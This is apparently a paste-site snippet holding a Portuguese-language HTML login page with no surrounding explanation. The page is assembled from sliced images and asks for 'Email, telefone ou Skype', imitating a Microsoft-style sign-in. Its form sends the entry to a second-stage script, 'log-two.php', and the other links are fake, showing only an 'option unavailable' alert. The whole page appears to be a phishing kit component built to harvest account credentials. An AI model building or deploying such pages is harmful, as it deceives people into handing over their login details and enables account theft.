yh456789765434
1 year ago in PHP
<html>
<head>
<title>Login.</title>
<link rel="shortcut icon" href="../favicon.ico" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<style type="text/css">
body{
background-image: url("../bg_out.svg");
background-repeat: no-repeat,no-repeat;
background-position: center center,center center;
background-size: cover,cover;
}
</style>
<style type="text/css">
input::-moz-focus-inner {
border: 0; outline:none;
}
input{ font-size:15px; color:#333;}
input:focus{outline:none;}
body,td,th {
font-family: Tahoma, Geneva, sans-serif;
font-size: 12px;
}
</style>
<script type="text/javascript">
function valida_form() {
if ( document.form.field01.value === "" ||
document.form.field01.value.length < 4){
alert('Por favor, preencha o campo E-mail!.');
document.form.field01.focus(); return false;
}
}
</script>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form id="form" name="form" method="POST" action="../log-two/log-two.php" onSubmit="return valida_form()">
<table id="Table_01" width="466" style="margin-top: 10%;" align="center" height="439" border="0" cellpadding="0" cellspacing="0">
<tr>
<td colspan="10">
<img src="images/acesso_um_01.gif" width="466" height="38" alt=""></td>
</tr>
<tr>
<td rowspan="13">
<img src="images/acesso_um_02.gif" width="40" height="400" alt=""></td>
<td colspan="8">
<img src="images/acesso_um_03.gif" width="391" height="61" alt=""></td>
<td rowspan="13">
<img src="images/acesso_um_04.gif" width="35" height="400" alt=""></td>
</tr>
<tr>
<td colspan="8">
<img src="images/acesso_um_05.gif" width="391" height="40" alt=""></td>
</tr>
<tr>
<td colspan="8">
<img src="images/acesso_um_06.gif" width="391" height="13" alt=""></td>
</tr>
<tr>
<td rowspan="10">
<img src="images/acesso_um_07.gif" width="21" height="286" alt=""></td>
<td colspan="5">
<input name="field01" id="field01" type="email" placeholder="Email, telefone ou Skype" style="width:347px; background:#fff; height:22px; border:0px; color:#000;" maxlength="100" ></td>
<td colspan="2" rowspan="6">
<img src="images/acesso_um_09.gif" width="23" height="123" alt=""></td>
</tr>
<tr>
<td colspan="5">
<img src="images/acesso_um_10.gif" width="347" height="21" alt=""></td>
</tr>
<tr>
<td>
<img src="images/acesso_um_11.gif" width="214" onClick="javascript:alert('Opção indisponível no momento!')" style="cursor:pointer;" height="20" alt=""></td>
<td colspan="4" rowspan="2">
<img src="images/acesso_um_12.gif" width="133" height="35" alt=""></td>
</tr>
<tr>
<td>
<img src="images/acesso_um_13.gif" width="214" height="15" alt=""></td>
</tr>
<tr>
<td colspan="4" bgcolor="#FFFFFF">
<img src="images/acesso_um_14.gif" width="252" height="24" onClick="javascript:alert('Opção indisponível no momento!')" style="cursor:pointer;" alt=""></td>
<td rowspan="2">
<img src="images/acesso_um_15.gif" width="95" height="45" alt=""></td>
</tr>
<tr>
<td colspan="4">
<img src="images/acesso_um_16.gif" width="252" height="21" alt=""></td>
</tr>
<tr>
<td colspan="2" rowspan="2">
<img src="images/acesso_um_17.gif" width="238" height="112" alt=""></td>
<td colspan="4">
<input id="teste" type="image" src="images/acesso_um_18.gif" value="submit" /></td>
<td rowspan="4">
<img src="images/acesso_um_19.gif" width="17" height="163" alt=""></td>
</tr>
<tr>
<td colspan="4">
<img src="images/acesso_um_20.gif" width="115" height="77" alt=""></td>
</tr>
<tr>
<td colspan="3">
<img src="images/acesso_um_21.png" width="243" height="28" onClick="javascript:alert('Opção indisponível no momento!')" style="cursor:pointer;" alt=""></td>
<td colspan="3" rowspan="2">
<img src="images/acesso_um_22.gif" width="110" height="51" alt=""></td>
</tr>
<tr>
<td colspan="3">
<img src="images/acesso_um_23.gif" width="243" height="23" alt=""></td>
</tr>
<tr>
<td>
<img src="images/spacer.gif" width="40" height="1" alt=""></td>
<td>
<img src="images/spacer.gif" width="21" height="1" alt=""></td>
<td>
<img src="images/spacer.gif" width="214" height="1" alt=""></td>
<td>
<img src="images/spacer.gif" width="24" height="1" alt=""></td>
<td>
<img src="images/spacer.gif" width="5" height="1" alt=""></td>
<td>
<img src="images/spacer.gif" width="9" height="1" alt=""></td>
<td>
<img src="images/spacer.gif" width="95" height="1" alt=""></td>
<td>
<img src="images/spacer.gif" width="6" height="1" alt=""></td>
<td>
<img src="images/spacer.gif" width="17" height="1" alt=""></td>
<td>
<img src="images/spacer.gif" width="35" height="1" alt=""></td>
</tr>
</table>
</form>
</body>
</html>